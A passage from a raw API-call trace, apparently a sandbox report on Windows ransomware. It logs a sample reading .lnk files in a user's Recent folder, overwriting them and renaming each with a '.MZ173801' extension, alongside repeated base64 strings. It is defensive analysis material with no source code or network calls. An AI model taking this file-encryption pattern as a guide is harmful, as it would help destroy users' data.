nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x279, lpOverlapped=0x0) returned 1 [0112.806] CloseHandle (hObject=0x3f4) returned 1 [0112.807] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZB jpmR.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zb jpmr.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZB jpmR.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zb jpmr.lnk.mz173801")) returned 1 [0112.807] GetCurrentThreadId () returned 0x1358 [0112.807] GetCurrentThreadId () returned 0x1358 [0112.807] GetCurrentThreadId () returned 0x1358 [0112.807] GetCurrentThreadId () returned 0x1358 [0112.807] GetCurrentThreadId () returned 0x1358 [0112.807] GetCurrentThreadId () returned 0x1358 [0112.807] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75444d8d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75444d8d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75444d8d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3ef, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="zcoh 1oAdzcJIB.lnk", cAlternateFileName="ZCOH1O~1.LNK")) returned 1 [0112.807] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.807] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.807] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zcoh 1oAdzcJIB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zcoh 1oadzcjib.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75444d8d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75444d8d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75444d8d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3ef)) returned 1 [0112.808] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.808] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.808] GetCurrentThreadId () returned 0x1358 [0112.808] GetCurrentThreadId () returned 0x1358 [0112.808] GetCurrentThreadId () returned 0x1358 [0112.809] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.809] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.809] GetCurrentThreadId () returned 0x1358 [0112.809] GetCurrentThreadId () returned 0x1358 [0112.809] GetCurrentThreadId () returned 0x1358 [0112.809] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zcoh 1oAdzcJIB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zcoh 1oadzcjib.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.809] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.809] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.809] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3ef [0112.809] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.809] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3ef, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3ef, lpOverlapped=0x0) returned 1 [0112.810] CloseHandle (hObject=0x3f4) returned 1 [0112.810] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zcoh 1oAdzcJIB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zcoh 1oadzcjib.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.811] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3ef, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3ef, lpOverlapped=0x0) returned 1 [0112.812] CloseHandle (hObject=0x3f4) returned 1 [0112.813] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zcoh 1oAdzcJIB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zcoh 1oadzcjib.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zcoh 1oAdzcJIB.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zcoh 1oadzcjib.lnk.mz173801")) returned 1 [0112.813] GetCurrentThreadId () returned 0x1358 [0112.813] GetCurrentThreadId () returned 0x1358 [0112.813] GetCurrentThreadId () returned 0x1358 [0112.813] GetCurrentThreadId () returned 0x1358 [0112.813] GetCurrentThreadId () returned 0x1358 [0112.813] GetCurrentThreadId () returned 0x1358 [0112.814] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaf028f7, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeaf028f7, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeaf028f7, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x27e, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="zcrVUSJG.lnk", cAlternateFileName="")) returned 1 [0112.814] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.814] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.814] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zcrVUSJG.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zcrvusjg.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaf028f7, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeaf028f7, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeaf028f7, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x27e)) returned 1 [0112.814] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.814] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.814] GetCurrentThreadId () returned 0x1358 [0112.814] GetCurrentThreadId () returned 0x1358 [0112.814] GetCurrentThreadId () returned 0x1358 [0112.815] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.815] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 